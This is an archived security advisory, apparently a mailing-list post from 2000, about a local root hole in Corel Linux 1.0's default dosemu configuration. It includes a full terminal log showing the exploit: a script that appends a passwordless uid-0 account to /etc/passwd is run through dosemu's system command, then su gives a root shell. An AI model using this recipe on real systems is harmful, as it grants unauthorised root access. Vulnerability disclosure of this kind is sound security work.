Corel Linux 1.0 dosemu default configuration: Local root vuln

From: suidat_private
Date: Wed Dec 31 1969 - 15:59:59 PST

    Re all,

    Hadn't seen this one around yet, has been on my site for about a week now.

    Corel's mailserver bounced me about this IIRC? Whats up Corel?

    Cheers.

    ----------------------------

    suidat_private - Corel Linux dosemu config error. Local root compromise.

    Software: 	Corel Linux 1.0 dosemu distribution configuration
    URL:		http://linux.corel.com
    Version:	Version 1.0
    Platforms:	Corel Linux only.
    Type:	 	Default misconfiguration. Noone reads README anymore??

    	Local users can take advantage of a packaging and configuration
    	error (which has been known and documented for a long time) to
    	execute arbitrary commands as root.

    	We see from the doc/README/SECURITY file as well as
    	http://www.dosemu.org/docs/README/0.98/README-3.html
    	written in 1997 that this configuration is bad.

    Vulnerability:

    	The system.com command is available to any user who runs the
    	dos emulator. This is a direct violation of the advice from
    	the SECURITY readme file:

    		Never allow the 'system.com' command (part of dosemu)
    		to be executed. It makes dosemu
                    execute the libc 'system() function'. Though privileges
    		are turned off, the process inherits the
                    switched uid-setting (uid=root, euid=user), hence the
    		unix process can use setreuid to gain root
                    access back. ... the rest you can imagine your self.

    Exploit:

    	This is a script log which details how to reproduce this:

    		Script started on Fri Feb 25 13:54:00 2000
    		nebula:~$ id
    		uid=1000(suid) gid=1000(suid) groups=1000(suid)
    		nebula:~$ cat > hack-corel
    		#!/bin/bash
    		echo "owned::0:0::/:/bin/bash" >> /etc/passwd
    		^D
    		nebula:~$ chmod a+rx hack-corel
    		nebula:~$ export PATH="$PATH:."
    		nebula:~$ dos
    		CPU speed set to 430/1 MHz
    		Running on CPU=586, FPU=1, rdtsc=1

    			[ snip bunch of dosemu crap ]

    		"Welcome to dosemu 0.98!
    		C:\> system hack-corel;
    		sh: : command not found
    		C:\> exitERROR: general protection at 0x3f0ff: 0
    		ERROR: SIGSEGV, protected insn...exiting!

    		nebula:~$ tail -1 /etc/passwd
    		owned::0:0::/:/bin/bash
    		nebula:~$ su owned
    		nebula:/home/suid# id
    		uid=0(root) gid=0(root) groups=0(root)
    		nebula:/home/suid# exit
    		exit
    		nebula:~$ exit

    		Script done on Fri Feb 25 13:55:27 2000

    Note:
    	This is not a vulnerability in dosemu itself. The documentation
    	warns users very specifically that this will happen if the system
    	is configured as such.

    Greets:

    	duke
    	cr